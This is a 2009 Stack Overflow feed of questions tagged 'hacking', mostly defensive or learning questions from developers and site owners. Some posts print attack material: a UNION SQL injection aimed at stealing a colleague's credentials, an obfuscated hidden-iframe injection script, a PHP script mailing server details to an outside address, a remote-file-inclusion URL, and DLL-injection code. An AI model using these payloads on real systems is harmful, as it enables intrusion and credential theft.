active questions tagged hacking - Stack Overflowmost recent 30 from stackoverflow.com2009-12-01T09:17:12Zhttp://stackoverflow.com/feeds/tag/hackinghttp://www.creativecommons.org/licenses/by-nc/2.5/rdfhttp://stackoverflow.com/questions/1814208/mysql-forbids-me-to-make-my-colleague-look-like-a-moron-or-how-mysql-forgets-ta-1MySQL forbids me to make my colleague look like a moron - or how MySQL forgets table names in an order by statement in a select union [closed]chanibal..pl2009-11-29T00:04:52Z2009-11-29T20:46:03Z
<p>One of our new employees made a really bad piece of code, not completely working, SQL injection points and stuff like that, what's really annoying is that he's not going to fix it as it's "working". I'm preparing an presentation that will make him suffer. To make his suffering eternal I wanted to show an SQL injection in the fullest form, that is steal his own email and password (OK, salted hash but still unthinkable to have a SQL, injection at our code)</p>
<p>OK, to the details, the SQL query is quite big so the thing I put here is just the problematic stuff - I narrowed the problem to and SQL query failing because of the order-by statement, example query:</p>
<p>First a <strong>working</strong> statement:</p>
<pre><code>select id, dupa from test where 2+2 = 5
union
select (select "pretty much anything"), dupa from test
order by dupa
limit 1;
</code></pre>
<p>And now the problematic version:</p>
<pre><code>select id, dupa from test where 2+2 = 5
union
select (select "pretty much anything"), dupa from test
order by test.dupa -- the problem lies here
limit 1;
</code></pre>
<p>The <code>order by</code> statement gives this problem:</p>
<blockquote>
<p>ERROR 1054 (42S22): Unknown column 'test.dupa' in 'order clause'</p>
</blockquote>
<p>As seen, the <code>order by dupa</code> works, <code>order by 2</code> also does, unfortunately as in all SQL injection attacks I have to deal with the remainders of the query </p>
<p>The injection is in the where part of the first statement.</p>
<p>The testing server is a recent MySQL on Linux, default configuration.</p>
http://stackoverflow.com/questions/1781307/website-hacking-why-it-is-always-possible-to-do4Website hacking - Why it is always possible to do?Narek2009-11-23T05:47:43Z2009-11-27T20:28:17Z
<p>Dear web developers, we know that each executable file can be reverse engineered (disassembled, decompiled). No mater how strong security you will implement, anyway if crackers want to, they do crack!!! Just that is a question of time. </p>
<p>What about websites? May we say that website can be completely safe from attacks of hackers (we assume that hosting is not vulnerable)? If no, than what is the reason?</p>
http://stackoverflow.com/questions/1804560/good-ethical-hacking-book3Good ethical hacking bookXinus2009-11-26T16:12:51Z2009-11-27T12:50:21Z
<p>What is the best book to start learning ethical hacking ? </p>
http://stackoverflow.com/questions/804337/a-hacking-game-for-programmers16A hacking game for programmers?Lucas McCoy2009-04-29T21:21:52Z2009-11-26T23:21:11Z
<p>Are there any games that I can play that allow me to use things I've learned while programming to hack (not for real, just in the game). I found <a href="http://www.slavehack.com/" rel="nofollow">Slavehack</a> but don't really like it; does anyone know of any others? </p>
http://stackoverflow.com/questions/1796224/how-to-add-mysites-mail-to-whitelist0How to add mysites mail to whitelist?vinothkumar2009-11-25T11:08:00Z2009-11-25T11:47:11Z
<p>hello friends,</p>
<p>Currently I am developing a website.In this I have the option to send invittion.When I send the Invitation it going to spam folder.How can I send my site's mails to Inbox.Whether I nedd the trafic to add into whitelist?Or is there anyother way to make to directly send the email to Inbox.My site is developed in PHP......Thanks in advance...</p>
http://stackoverflow.com/questions/1782197/site-compromised-has-anyone-seen-this-hack-before-googleanalyticsresearchengi0Site compromised, has anyone seen this hack before? - googleanalyticsresearchengine.eu [closed]Dan C2009-11-23T10:07:57Z2009-11-23T10:07:57Z
<p>Hi,</p>
<p>One of our sites has been compromised and we have had a warning email from google. The site has been blocked by Google in Firefox, has anyone seen this type of attack before?</p>
<blockquote>
<p>Of the 1 pages we tested on the site
over the past 90 days, 1 page(s)
resulted in malicious software being
downloaded and installed without user
consent. The last time Google visited
this site was on 2009-11-19, and the
last time suspicious content was found
on this site was on 2009-11-19.</p>
<p>Malicious software includes 1
trojan(s). Successful infection
resulted in an average of 6 new
process(es) on the target machine.</p>
<p>Malicious software is hosted on 1
domain(s), including
googleanalyticsresearchengine.eu/.</p>
<p>1 domain(s) appear to be functioning
as intermediaries for distributing
malware to visitors of this site,
including web-bureau.com/.</p>
<p>This site was hosted on 1 network(s)
including AS31727 (NODE4).</p>
</blockquote>
http://stackoverflow.com/questions/772596/black-hat-knowledge-for-white-hat-programmers38Black hat knowledge for white hat programmersDinah2009-04-21T13:29:35Z2009-11-23T07:14:33Z
<p>There's always skepticism from non-programmers when honest developers learn the techniques of black hat hackers. Obviously though, we need to learn many of their tricks so we can keep our own security up to par.</p>
<p>To what extent do you think an honest programmer needs to know the methods of malicious programmers?</p>
http://stackoverflow.com/questions/1761288/will-this-hack-make-apple-furious-will-the-reject-my-app3Will this hack make apple furious? (Will the reject my app ?)Madhup2009-11-19T06:30:44Z2009-11-22T09:04:13Z
<p>Hi,</p>
<p>I have taken this code from</p>
<p><a href="http://stackoverflow.com/questions/883208/how-to-change-background-color-of-uialertview">http://stackoverflow.com/questions/883208/how-to-change-background-color-of-uialertview</a> </p>
<pre><code>UIAlertView *theAlert = [[[UIAlertView alloc] initWithTitle:@"Atention"
message: @"YOUR MESSAGE HERE", nil)
delegate:nil cancelButtonTitle:@"OK" otherButtonTitles:nil] autorelease];
[theAlert show];
UILabel *theTitle = [theAlert valueForKey:@"_titleLabel"];
[theTitle setTextColor:[UIColor redColor]];
UILabel *theBody = [theAlert valueForKey:@"_bodyTextLabel"];
[theBody setTextColor:[UIColor blueColor]];
UIImage *theImage = [UIImage imageNamed:@"Background.png"];
theImage = [theImage stretchableImageWithLeftCapWidth:16 topCapHeight:16];
CGSize theSize = [theAlert frame].size;
UIGraphicsBeginImageContext(theSize);
[theImage drawInRect:CGRectMake(0, 0, theSize.width, theSize.height)];
theImage = UIGraphicsGetImageFromCurrentImageContext();
UIGraphicsEndImageContext();
[[theAlert layer] setContents:[theImage CGImage]];
</code></pre>
<p>orginally posted by oxigen.</p>
<p>I am not very sure should I use this code in my app. Will apple have any issues regarding this hack (will they reject the app?)</p>
http://stackoverflow.com/questions/1745199/php-http-handling0PHP http handlingnull_radix2009-11-16T22:15:56Z2009-11-16T23:28:48Z
<p>Is there a way to prevent a php script from sending a http response when the script is finished executing? If not in php is it possible in any-other common web scripting langues? </p>
http://stackoverflow.com/questions/1705873/prevent-hack-a-site-by-linux-multi-support-ability0prevent hack a site by linux multi Support ability saeed arab sheybani2009-11-10T05:47:07Z2009-11-10T15:36:11Z
<p>One of the site Hacking methods written in php in apache server
The use Images with prefix. Php such as
<strong>.php.gif</strong> that apache is trying to run it
How can htaccess configuration to disable this feature</p>
http://stackoverflow.com/questions/1699085/way-to-make-a-function-aware-who-called-it0way to make a function aware who called itOmnipresent2009-11-09T04:23:23Z2009-11-09T04:43:07Z
<p>in java is it possible to make a method aware of who called it (without changing parameters) and then return something else? </p>
<pre><code>public class MyClassA {
public static final String someStirng = "this is some String"
public String getSomeString ()
{
return someString;
}
}
public class MyClassB extends MyClassA {
public static final String otherstring = "This is other string"
public SomeBean getContents()
{
SomeBean s = new someBean();
//if this method gets called from MyCallingClassOther then
// i want s.setContents(otherstring)
s.setContents(getSomeString());
return s;
}
}
public class MyCallingClass {
public String callingclassContents ()
{
MyClassB myb = new MyClassB();
return ((SomeBean)myb.getContents()).getFirstName();
}
}
public class MyCallingClassOther {
public String callingOtherContents ()
{
MyClassB myb = new MyclassB();
return ((SomeBean)myb.getContents()).getFirstName();
}
}
</code></pre>
<p>so when <code>getContents()</code> method of <code>MyClassB</code> gets called from <code>MyCallingClassOther</code> then I want a different thing returned. </p>
<p>Only code I can change is the body of <code>getContents()</code> (cant change parms). or I can change body of <code>callingOtherContents()</code> in <code>MyCallingClassOther</code>. </p>
<p>This is small piece of a bigger puzzle I am trying to solve ...which obviously was designed poorly. This is kind of a hackway.</p>
<p>Also I'd like to see how it is possible in some other languages?</p>
<p>and If you are wondering why I cant change parameters...thats because I do not want to change anything in <code>callingclassContents()</code> of <code>MyCallingClass</code></p>
http://stackoverflow.com/questions/1668379/has-our-site-been-hacked-google-says-we-are-malware-help0Has our site been hacked? Google says we are malware! HELP [closed]Dan C2009-11-03T16:15:57Z2009-11-08T04:07:30Z
<p>We receieved an email direct from google this morning, stating that our site is carrying malware. We are a respectful marketing company with no dodgy code or links to malware on our site.</p>
<p>We now have a warning next to our site in the SERP's!</p>
<p>Has this happened to anyone before, could it be a competitor trying to sabotage us?</p>
<p>Here is google diagnosis....</p>
<p><a href="http://www.google.com/safebrowsing/diagnostic?site=http%3A//www.firstimpression.co.uk/&hl=en" rel="nofollow">http://www.google.com/safebrowsing/diagnostic?site=http%3A//www.firstimpression.co.uk/&hl=en</a></p>
<p>What can be done about this?, please help :(</p>
http://stackoverflow.com/questions/1503764/the-simplest-code-hacking-3The simplest code hackingNarek2009-10-01T12:49:00Z2009-11-02T09:01:20Z
<p>I have the following code:</p>
<pre><code>#include <iostream>
#include <string>
void main()
{
std::string str;
std::cin>>str;
if(str == "TheCorrectSerialNumber")
std::cout<<"Hello world!!!"<<std::endl;
}
</code></pre>
<p>I need a decompilation or disassemblering tool which can help me by doing below listed steps find the "TheCorrectSerialNumber". So the steps are:</p>
<ol>
<li>decompile or diassembler the executable of my code</li>
<li>run the exe and type not the Correct Serial but something like “AAA”</li>
<li>find my “AAA” with what string is being compared and finally find out the "TheCorrectSerialNumber".</li>
</ol>
<p>Please provide me also with <strong>directions</strong> how your suggested tool is doing above listed steps.</p>
<p>Thanks a lot!!!</p>
<p>NOTE: For those who tend to think that I want to crack someone’s code! First look ant my questions that I've asked just before and just after this question. I am a programmer and I need to concern about my codes security. Thus I have decided to crack my codes and to do some exercises on the other codes (on the sites that teach cracking there are a bunch of softs that are designed to be cracked) to understand how to deliver a secure code. If you know how people do cracking you probably will create more secure code that someone who doesn't know. And if you what to study how to crack you have to try. That is my point!</p>
http://stackoverflow.com/questions/1650854/javascript-being-injected-in-my-php-pages5JavaScript being injected in my PHP Pagesthegunner2009-10-30T16:21:38Z2009-10-30T17:33:00Z
<p>I have a website, and I just discoverd that somehow someone injected JavaScript on my page. How can I figure out what it does and how they did it?</p>
<pre><code><script> var x = unescape("%68% (**** some other hex characters here
****%74%2e%63%6e%2f%76%69%64");document.write("<i"+"fr"+"am"+"e
s"+"r"+"c=\""+x+"/ind"+"e"+"x.p"+"hp\" w"+"id"+"th=\"0\" he"+"i"+"ght=\"0\"
fr"+"a"+"m"+"ebor"+"de"+"r=\"0\"><"+"/ifra"+"m"+"e>"); </script>
</code></pre>
<p>Which I'm not sure how got there. Anyone know how it got there? and what I can do to remove it?</p>
http://stackoverflow.com/questions/1646822/scriptkiddie-flooding-my-website-with-this-snippit1scriptkiddie flooding my website with this snippitiaddesign2009-10-29T21:55:56Z2009-10-29T23:34:15Z
<p>hey, someone outthere is trying to flood my website with some script. luckly my application caught it</p>
<p>i just wanna know what this code is doing </p>
<pre><code><script>
<!--
document.write(unescape("<?php
//=================================
//
// scan inb0x hotmail v3.0
//
// coded by FilhOte_Ccs and LOST
// re-c0d3d by delet
//
//
//=================================
//
ini_set("max_execution_time",-1);
set_time_limit(0);
$user = @get_current_user();
$UNAME = @php_uname();
$SafeMode = @ini_get('safe_mode');
if ($SafeMode == '') { $SafeMode = "OFF"; }
else { $SafeMode = " $SafeMode "; }
$delet=($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
$dados=("<b>Produto</b> = " . $UNAME . "
<i>Seguran?a</i> = " . $SafeMode . "
http://" . $delet . "
Muito obrigado por comprar o hehe1 com: <u>delet</u>");
$email = "inbox200905@hotmail.com";
$assunto = "lup@";
$email1 = "inbox200905@hotmail.com";
$headers = "From: <$email>\r\n";
$headers = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
if(mail($email1,$assunto,$dados,$headers)){
echo "Isso, ja foi!";
exit();
}
else{
echo "N?o foi.";
exit();
}
?>
"));
//-->
</script>
</code></pre>
<p>he was trying to do something like this:
mysite/index.php?dll=<a href="http://www.forms.dgpj.mj.pt/box2.txt" rel="nofollow">http://www.forms.dgpj.mj.pt/box2.txt</a>?</p>
<p>thanks</p>
http://stackoverflow.com/questions/1641730/whethr-we-can-get-the-source-code-from-the-exe-file-3whethr we can get the source code from the exe file? [closed]vinothkumar2009-10-29T05:09:14Z2009-10-29T05:13:20Z
<p>I need to get the source code from the exe file.Whether is it possible?Then How?</p>
http://stackoverflow.com/questions/1634425/api-authentication-design-and-hackability5API authentication design and hackabilityPAS2009-10-28T00:03:16Z2009-10-28T22:17:37Z
<p>Question: Is this API authentication technique easily hackable?</p>
<pre>
apiKey = "123456789"
apiCallId = "1256341451"
apiSecret = "67d48e91ab2b7471d4be2a8c2e007d13"
sig = md5(apiKey + apiCallId + apiSecret) = 09c297a354219f173bfc49c2e203ce03
</pre>
<p>where</p>
<ul>
<li><code>apiKey</code>: some unique identifier for the user</li>
<li><code>apiCallId</code>: a unique integer that must be increasing in value (e.g. UNIX time stamp)</li>
<li><code>apiSecret</code>: string known only to the user, and us - not passed in URL</li>
<li><code>sig</code>: "unhackable" signature of this API call - MD5 hash</li>
</ul>
<p>Example API call:</p>
<p><a href="http://api.domain.com/?apiKey=123456789&apiCallId=1256341451&sig=09c297a354219f173bfc49c2e203ce03&param1=x&param2=y" rel="nofollow">http://api.domain.com/?apiKey=123456789&apiCallId=1256341451&sig=09c297a354219f173bfc49c2e203ce03&param1=x&param2=y</a></p>
<p>This API does not require a session, and is not designed for a 3rd party to use on behalf of a user. Instead, it is to be used by the user themselves.</p>
<p>I really like the simplicity of this. The requirement of <code>apiCallId</code> being unique, and always increasing means reusing a <code>sig</code> is not possible, so I feel like it is secure (protected against replay attacks), but I am not an expert.</p>
<p>Other APIs use all of the GET parameters sorted alphabetically when calculating the <code>sig</code>, but I do not see why this is necessary when including <code>apiCallId</code>.</p>
<p>Please try and hack this now before it is implemented and released :-)</p>
<p>I welcome any feedback, suggestions and security education.</p>
http://stackoverflow.com/questions/1615188/harmless-hacking-trick-an-application-into-thinking-that-a-local-file-has-actual2Harmless hacking: Trick an application into thinking that a local file has actually come from a serverAlterlife2009-10-23T18:32:47Z2009-10-23T18:57:40Z
<p>I've got a flash application (not written by me) which is accessing a configuration file which present on a http server. There are a lot of settings in the config file which seem to affect its behaviour.</p>
<p>I'm not interested in decompiling the swf file or getting too deep into this. </p>
<p>Basically I would like to try to alter the behaviour of the application by making it pick up a modified version of the configuration file instead of the one on the server. Is there a way to do this easily (perhaps a firefox extension like firebug?).</p>
<p>Basically when the application requests <a href="http://server/config.xml" rel="nofollow">http://server/config.xml</a> I want something that gets in the way and returns ~/myconfig.xml instead.</p>
http://stackoverflow.com/questions/1612170/rogue-processess-in-linux0Rogue processess in linux [closed]Mark Blades2009-10-23T08:51:45Z2009-10-23T09:01:26Z
<p>Hi,</p>
<p>I'm running apache on linux server. I have noticed the following processes running which I am not expecting to see, and appear rogue.</p>
<p>Can anyone please advise me what they mean?</p>
<p>Running <code>ps aux | grep apache</code> gave me the following:</p>
<pre><code>root 6196 0.2 0.0 86708 3100 ? Ss 04:44 0:00 sshd: apache [priv]
sshd 6202 0.0 0.0 61868 1372 ? S 04:44 0:00 sshd: apache [net]
</code></pre>
<p>The server was recently hacked by "c99shell" (<a href="http://www.chr00t.com/2009/01/c99shell-security/" rel="nofollow">http://www.chr00t.com/2009/01/c99shell-security/</a>) script which I tracked down and removed (as far as I know).</p>
<p>Thanks,
Mark.</p>
http://stackoverflow.com/questions/1584482/downloading-php-files0Downloading php files? Narek2009-10-18T09:45:44Z2009-10-20T07:42:54Z
<p>Is it possible to download php files from the server where they are located? I am a beginner in web area, and I worry that hackers may have special tools to download, see my code and understand where I have programmed vulnerable codes to hack my site.</p>
http://stackoverflow.com/questions/1584502/loadlibraryw-doesnt-work-while-loadlibrarya-does-the-job0LoadLibraryW doesn't work while LoadLibraryA does the jobEtan2009-10-18T09:56:13Z2009-10-18T10:27:16Z
<p>I have written some sample program and DLL to learn the concept of DLL injection.</p>
<p>My injection code to inject the DLL to the sample program is as follows (error handling omitted):</p>
<pre><code>std::wstring dll(L"D:\\Path\\to\\my\\DLL.dll");
LPTHREAD_START_ROUTINE pLoadLibraryW =
(LPTHREAD_START_ROUTINE)GetProcAddress(hKernel32, "LoadLibraryW");
int bytesNeeded = WideCharToMultiByte(CP_UTF8, 0, dll.c_str(), dll.length(),
NULL, 0, NULL, NULL);
std::vector<byte> dllName(bytesNeeded);
WideCharToMultiByte(CP_UTF8, 0, dll.c_str(), dll.length(),
(LPSTR)&dllName[0], bytesNeeded, NULL, NULL);
// Memory is a class written by me to simplify memory processes.
// Constructor takes desired permissions.
Memory mem (pid, false, true, false, true, false, false, false,
false, false, true, true, true, false);
// Ensures deletion of the allocated range.
// true / true / false = read and write access, no execute permissions
std::tr1::shared_ptr<void> allocated =
mem.AllocateBytes(dllName.size(), true, true, false);
mem.WriteBytes((unsigned int)allocated.get(), dllName);
mem.CreateThread(pLoadLibraryW, allocated.get());
</code></pre>
<p>Memory::CreateThread is as follows:</p>
<pre><code>void Memory::CreateThread(LPTHREAD_START_ROUTINE address, LPVOID parameter) const {
std::tr1::shared_ptr<void> hThread(CreateRemoteThread(m_hProcess.get(),
NULL, 0, address, parameter, 0, NULL), CloseHandle);
if (hThread.get() == NULL) {
throw std::runtime_error("Memory::CreateThread: CreateRemoteThread failed");
}
DWORD returned = WaitForSingleObject(hThread.get(), INFINITE);
if (returned != WAIT_OBJECT_0) {
throw std::runtime_error("Memory::CreateThread: The remote thread did not complete properly");
}
}
</code></pre>
<p>The problem is, that the module isn't loaded. However, when I change the second line to </p>
<pre><code>LPTHREAD_START_ROUTINE pLoadLibraryW =
(LPTHREAD_START_ROUTINE)GetProcAddress(hKernel32, "LoadLibraryA");
</code></pre>
<p>it works (since the test dll has no unicode characters in it's name).</p>
<p>How to make it work with <code>LoadLibraryW</code>?</p>
http://stackoverflow.com/questions/1580720/security-question-is-this-a-valid-way-to-hack-into-facebook-applications-and-p0Security question: Is this a valid way to hack into Facebook applications? (and possibly Facebook)?alex2009-10-16T22:19:56Z2009-10-16T22:53:53Z
<ol>
<li>Your friend connects to Facebook and checks "remember me".</li>
<li>Facebook creates a cookie on the browser.</li>
<li>Your friends goes to the bathroom.</li>
<li>You steal your friend's cookies from his browser and its data.</li>
<li>You go home and make these cookies with that data.</li>
</ol>
<p>Assuming Facebook <strong>does not associate cookies + IP</strong>, you can gain access to the Facebook page. Edit: True, Facebook does not check for IP.</p>
<p>Now, let's take a look at Facebook Connect. This is the key. </p>
<ol>
<li>User "connects" by pushing the button.</li>
<li>Facebook sets a cookie on the browser , which your application backend will read from to determine if the user is authenticated. Then, you associate this FB-cookie-id with the user in YOUR system.</li>
</ol>
<p>If your system <strong>does not check for IP</strong>, then theoretically faking the cookie will allow you access into the application that used Facebook Connect. Which then you can gain access to the application, </p>
<p><strong><em>Is it valid to say that you should check for IP when doing Facebook connect to add a level of security?</em></strong> But even if you do, some people have commented about IP Spoofing.</p>
<p>@everybody who says "Physical Access":</p>
<p>Yes, I agree that the concept of physical access makes this question trivial. However, this is a hole that the APPLICATION must be aware of. Sure, the Facebook profile/worthless application wouldn't matter much...but What if the application was a banking system? All I am saying is that if Citibank or Bank of America used "Facebook Connect" (which would be stupid, but let's assume), then this method would prove to be an easy way to access their account.</p>
<p>Therefore, Facebook Connect should NOT be used with anything "important". Right?</p>
http://stackoverflow.com/questions/1571087/help-with-tracking-down-hacking-malware-attempts3Help with tracking down hacking/malware attemptsRippo2009-10-15T08:40:59Z2009-10-15T10:14:18Z
<p>I currently have a .net web application on a cluster based system (Rackspace cloud). In web config I have set up the following machine key.</p>
<pre><code><machineKey validationKey='DE0...etc'
decryptionKey='A97...etc'
validation='SHA1'/>
</code></pre>
<p>We were getting a quite a few of the following errors on a daily basis:</p>
<blockquote>
<p>Validation of viewstate MAC failed. If
this application is hosted by a Web
Farm or cluster, ensure that
configuration specifies the same
validationKey and validation
algorithm. AutoGenerate cannot be used
in a cluster.</p>
</blockquote>
<p>I did a bit of Googling and added the following. This has stopped all the previous errors. However it may open the door for various hacking attacks.</p>
<pre><code><pages enableViewStateMac="false">
</code></pre>
<p>However I am finding now that I get the following errors </p>
<blockquote>
<p>The state information is invalid for
this page and might be corrupted.</p>
</blockquote>
<p>I am trying to work out what may be causing these two types of errors. Are they bots? Are they genuine web users? Are they hacking/malware attempts? Is this a normal occurrence and I should just ignore them...</p>
<p>Can anyone shed any light?
Thanks</p>
http://stackoverflow.com/questions/1527172/how-secure-is-php15How secure is PHP?Steve2009-10-06T18:05:58Z2009-10-15T08:14:11Z
<p>I am somewhat new to PHP coding and I am aware that malicious users can hack a website if you have not sanitized your PHP code. What I am wondering is whether they need a data entry box (like for file submissions, or user-name/password entry fields)?. Do commands like "include (header.php)" also need some sort of security or are they innately safe?</p>
http://stackoverflow.com/questions/1562918/wherein-newbie-disassembly-queries-are-made1Wherein newbie disassembly queries are made.Venerable Garbage Collector2009-10-13T21:12:17Z2009-10-13T22:08:16Z
<p>I'm relatively(read: stupid newbie) familiar with disassembly but this bit stumped me:
I have a set of save files compressed with zlib and a game that loads them. Their structure is known and once loaded, the structs in memory are identical to their corresponding save files. The issue is that the game was written in an ass-backwards, scripting-only-not language that somehow manages to leave no static pointers. At all. Several dozen people tried, and seemingly static pointer paths would break after minor changes on the same machine. An easy solution would be to just search the process' memory for the contents of the files, but this is a pretty bruteforce solution which I would rather avoid for educational purposes.</p>
<p>The Questions:</p>
<ul>
<li>I'm trying to use OllyDBG. I am terrible at it, but nevertheless managed to make some trivial codecaves that actually worked. Am I using the right tool for the job or am I a stupid newbie? What tools does the modern reverser have in their kit?</li>
<li>On a related note, I have to resort to using Cheat Engine(or its cousin MHS) for memory searches. This seems a bit counterintuitive. Does OllyDBG really give you no way to search for values and refine results or am I missing something?</li>
<li>How do you set breakpoints on WINAPI? Hell, how does WINAPI look like at assembly level? This is something I haven't managed to find any decent information about and I'm pretty sure that Google has more than enough of it but I just can't seem to type the right words in.</li>
<li>Expanding on the above, how does one set dynamic breakpoints? If I am interested in a specific, often called function but <em>only</em> if EAX at that point is equal to a specific value, how would I get Olly(or anything else) break on that condition?</li>
<li>Any general books/suggestions/resources on disassembly or low level programming oriented at breaking things.</li>
</ul>
<p>Disclaimer: game in question is freeware, single-player, author does not disapprove, project intended to extend functionality more than anything. Also first post, hopefully I haven't fumbled too badly. :(</p>
http://stackoverflow.com/questions/1353498/how-do-they-hack-wireless-networks1How do they hack wireless networks? [closed]Tom Lynam2009-08-30T09:32:26Z2009-10-12T15:00:49Z
<p>I'm trying to "hack" my home wireless network basically to see how easy it is and to learn more about how the process works</p>
<p>There is loads of information out there about it and it's all a bit confusing i have to admit. There seems to be a million different pieces of software</p>
<p>Can anyone recommend some free software for windows to achieve this?</p>
<p>And what is the basic process i.e. is there some software that picks up the available networks, other software that then cracks them etc..</p>
<p>i am a windows programmer and no little about networking, wifi etc...</p>
<p>Thanks for the help</p>
http://stackoverflow.com/questions/1548925/sockets-sniffer0sockets snifferunknown (google)2009-10-10T20:01:14Z2009-10-10T20:17:13Z
<p>Does someone know of a good .Net socket sniffer?
I'm trying to build an IM sniffer that can show the Unicode chars correctly.</p>
<p>TY</p>
http://stackoverflow.com/questions/1547012/where-hackers-hang-out-2where hackers hang out [closed]xob2009-10-10T03:58:01Z2009-10-10T04:00:10Z
<p>Something on the news or someone at work mentioned a heavily populated site that I had not heard of. I thought I had bookmarked the site but cannot find it. I need to ask a question to this forum group. What is the most popular forum for this type of thing. I was told, "this is where all the bad guys go".</p>
http://stackoverflow.com/questions/1495371/allow-javascript-protect-against-xss-unique-scenario0Allow Javascript - protect against XSS? (unique scenario)Ian Silber2009-09-29T22:56:34Z2009-10-08T02:59:34Z
<p>I'm in the process of building an application (a CMS to be more specific) which allows users to add Javascript to their content. There really is no way around allowing Javascript, and because of it, some security concerns are now becoming quite apparent. What we're mainly concerned about is cookie theft.</p>
<p>To explain the system a bit more, the CMS allows a single user to have access to multiple sites. A user can invite another user to edit their site. Someone accessing a site will then execute any JS that has been added.</p>
<p>Here's a scenario we're trying to get around:</p>
<ol>
<li>Malicious user "Evil Bob" writes Javascript to read cookies and email them to him. </li>
<li>Evil Bob invites me to edit their site</li>
<li>I view site and my cookies are sent off to the Evil Bob.</li>
<li>Evil Bob now has access to my cookies, and can edit any sites I have access to.</li>
</ol>
<p>We have added some cookie theft protection, which makes it a bit harder to spoof cookies. If order to use a stolen cookie, you would also have to spoof all headers to match those of the victim.</p>
<p>We've had some ideas for fixes, like putting each site on an individual sub-domain, and requiring separate login for each account. Maybe this is the best solution.</p>
<p>Any other recommendations?</p>
http://stackoverflow.com/questions/1496549/outlook-security1Outlook securityArnold2009-09-30T07:18:17Z2009-10-05T13:40:38Z
<p>Hi to Everyone!!</p>
<p>Is there any other way to get rid of this outlook security message? "A program is trying to automatically send e-mail on your behalf ... and so on" and it gives me an option to select Yes , No & Help. </p>
<p>Im currently developing an outlook automation app using Ms Access. Everytime I issue Send command this message popups, I tried using SendKeys "%s" but it does not work in Access 2007.</p>
<p>Is there any alternative solution for this? Thanks!!</p>